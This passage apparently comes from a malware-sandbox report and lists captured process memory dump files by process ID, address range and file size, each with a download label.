memory/4148-268-0x00007FFB34660000-0x00007FFB34929000-memory.dmp

Filesize
2.8MB

Download
memory/4148-250-0x00007FF70DDC0000-0x00007FF70E36E000-memory.dmp

Filesize
5.7MB

Download
memory/4148-259-0x000002AAF9AB0000-0x000002AAF9AB2000-memory.dmp

Filesize
8KB

Download
memory/4148-276-0x000002AAF7AC0000-0x000002AAF7AFC000-memory.dmp

Filesize
240KB

Download
memory/4148-254-0x00007FF70DDC0000-0x00007FF70E36E000-memory.dmp

Filesize
5.7MB

Download
memory/4148-273-0x000002AAF7A50000-0x000002AAF7A62000-memory.dmp

Filesize
72KB

Download
memory/4148-270-0x000002AAF9E10000-0x000002AAF9F1A000-memory.dmp

Filesize
1.0MB

Download
memory/4300-170-0x0000000000400000-0x0000000002167000-memory.dmp

Filesize
29.4MB

Download
memory/4300-149-0x00000000024EA000-0x00000000024F3000-memory.dmp

Filesize
36KB

Download
memory/4300-168-0x00000000024EA000-0x00000000024F3000-memory.dmp

Filesize
36KB

Download
memory/4300-169-0x00000000022B0000-0x00000000022B9000-memory.dmp

Filesize
36KB

Download
memory/4344-191-0x0000000004600000-0x00000000047BE000-memory.dmp

Filesize
1.7MB

Download
memory/4452-303-0x0000000010000000-0x0000000010D56000-memory.dmp

Filesize
13.3MB

Download
memory/4460-242-0x0000000003129000-0x0000000003195000-memory.dmp

Filesize
432KB

Download
memory/4460-258-0x0000000000400000-0x0000000002EEE000-memory.dmp

Filesize
42.9MB

Download
memory/4512-275-0x0000000002BD0000-0x0000000002C06000-memory.dmp

Filesize
216KB

Download
memory/4620-377-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4768-269-0x0000000000760000-0x00000000007A4000-memory.dmp

Filesize
272KB

Download
memory/4768-272-0x0000000000400000-0x0000000000492000-memory.dmp

Filesize
584KB

Download
memory/4768-243-0x00000000005F0000-0x0000000000617000-memory.dmp

Filesize
156KB

Download
memory/4840-372-0x0000000002239000-0x0000000002242000-memory.dmp

Filesize
36KB

Download
memory/4972-240-0x0000000000790000-0x00000000007F0000-memory.dmp

Filesize
384KB

Download
memory/5000-260-0x0000000074890000-0x00000000748DC000-memory.dmp

Filesize
304KB

Download
memory/5000-256-0x0000000075CA0000-0x0000000076253000-memory.dmp

Filesize
5.7MB

Download
memory/5000-265-0x0000000000FC0000-0x00000000011E1000-memory.dmp

Filesize
2.1MB

Download
memory/5000-253-0x0000000071D20000-0x00000000724D0000-memory.dmp

Filesize
7.7MB

Download
memory/5000-231-0x0000000000FC0000-0x00000000011E1000-memory.dmp

Filesize
2.1MB

Download
memory/5000-246-0x0000000000FC0000-0x00000000011E1000-memory.dmp

Filesize
2.1MB

Download
memory/5000-249-0x0000000000FC0000-0x00000000011E1000-memory.dmp

Filesize
2.1MB

Download
memory/5000-262-0x0000000003180000-0x00000000031C6000-memory.dmp

Filesize
280KB

Download
memory/5000-252-0x0000000074950000-0x00000000749D9000-memory.dmp

Filesize
548KB

Download
memory/5000-235-0x0000000001500000-0x0000000001501000-memory.dmp

Filesize
4KB

Download
memory/5000-244-0x0000000076A70000-0x0000000076C85000-memory.dmp

Filesize
2.1MB

Download
memory/5016-266-0x0000000071D20000-0x00000000724D0000-memory.dmp

Filesize
7.7MB

Download
memory/5016-239-0x0000000000570000-0x0000000000588000-memory.dmp

Filesize
96KB

Download
memory/5428-363-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download
memory/5428-365-0x0000000000400000-0x0000000000446000-memory.dmp

Filesize
280KB

Download